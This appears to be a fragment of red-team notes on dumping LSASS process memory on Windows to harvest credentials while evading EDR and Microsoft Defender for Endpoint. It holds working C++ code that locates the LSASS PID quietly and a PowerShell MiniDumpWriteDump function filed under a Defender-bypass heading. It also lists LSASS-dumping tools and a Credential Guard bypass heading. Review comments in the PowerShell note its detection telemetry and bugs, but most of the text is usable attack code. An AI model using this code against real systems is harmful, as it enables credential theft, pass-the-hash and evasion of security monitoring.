Using `tasklist /v` to enumerate the LSASS PID is detected by EDR.
FindLSASSPID.cpp
// Find PID of a process by name
int FindPID(const char* procname)
{
int pid= 0;
PROCESSENTRY32 proc = {};
proc.dwSize= sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);bool bProc= Process32First(snapshot, &proc);
while (bProc)
{
if (strcmp(procname, proc.szExeFile) == 0)
{
pid= proc.th32ProcessID;
break;
}
bProc= Process32Next(snapshot, &proc);
}
return pid;
}
Nanodump
POSTDump
Powershell - Bypass Defender for Endpoint
# Write-MemoryDump: writes a minidump of the process whose PID is returned by
# Get-ProcessId (defined outside this function) to $outputPath, using the
# [DumpGenerator]::MiniDumpWriteDump P/Invoke wrapper (also defined outside
# this function). Returns $true on success and $false on any failure; every
# exception is caught and reported via Write-Host rather than rethrown.
#
# NOTE(review): the three steps below — obtaining a handle to the target
# process, creating an output file, then calling MiniDumpWriteDump on that
# handle — are exactly the sequence that process-access telemetry (Sysmon
# Event ID 10 / EDR "LSASS access" and minidump-API rules) is written to
# surface; the Write-Host breadcrumbs are the least of the signal this
# function produces.
function Write-MemoryDump {
param(
# Destination path of the dump file; created or overwritten (FileMode Create).
[string]$outputPath
)
# PID comes from a helper outside this function; a falsy result (0/$null) aborts early.
$processId = Get-ProcessId
if (-not $processId) { return $false }
try {
# Open target process
# Reading .Handle makes the Process object open a handle to the PID.
# GetProcessById itself throws when no such process exists, so that case
# lands in the catch block below rather than in this null check.
$processHandle = [System.Diagnostics.Process]::GetProcessById($processId).Handle
if (-not $processHandle) {
Write-Host “Failed to open target process with PID: $processId”
return $false
}
Write-Host “Successfully opened target process with PID: $processId”
# Create dump file
# FileMode.Create truncates an existing file. The raw OS handle is extracted
# because the native call takes a HANDLE, not a .NET stream.
$fileStream = [System.IO.File]::Open($outputPath, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write)
$fileHandle = $fileStream.SafeFileHandle.DangerousGetHandle()
Write-Host “Dump file created at $outputPath”
# Write memory dump
# Argument order follows dbghelp's MiniDumpWriteDump(hProcess, ProcessId,
# hFile, DumpType, ExceptionParam, UserStreamParam, CallbackParam).
# $FullMemoryDump is neither a parameter nor a local of this function; it
# resolves from the enclosing scope — presumably a MINIDUMP_TYPE value,
# confirm where it is assigned.
$success = [DumpGenerator]::MiniDumpWriteDump(
$processHandle,
[uint32]$processId,
$fileHandle,
[uint32]$FullMemoryDump,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero
)
# Close file stream and release process handle
# Neither call is in a finally block: if the native call throws, the stream
# stays open until garbage collection. Marshal.Release is the COM
# IUnknown::Release wrapper, not a Win32 handle close; the Process object
# that owns the handle is simply left to the GC.
$fileStream.Close()
[System.Runtime.InteropServices.Marshal]::Release($processHandle)
# $success is the native BOOL result: non-zero means the dump was written.
if ($success) {
Write-Host “Memory dump successfully written to $outputPath”
return $true
} else {
Write-Host “Failed to write memory dump.”
return $false
}
} catch {
# Any exception (bad PID, file I/O, P/Invoke failure) is swallowed here and
# reported only through Write-Host.
Write-Host “An error occurred: $_”
return $false
}
}
Lsass-Shtinkering
Works on Windows 10 and Server 2022; does not work on Server 2019.
Go-lsass
Blindsight
AxiomDumper
Bypass Credential Guard
Credential Guard is a virtualization-based isolation technology for LSASS that prevents attackers from stealing credentials which could be used in pass-the-hash attacks.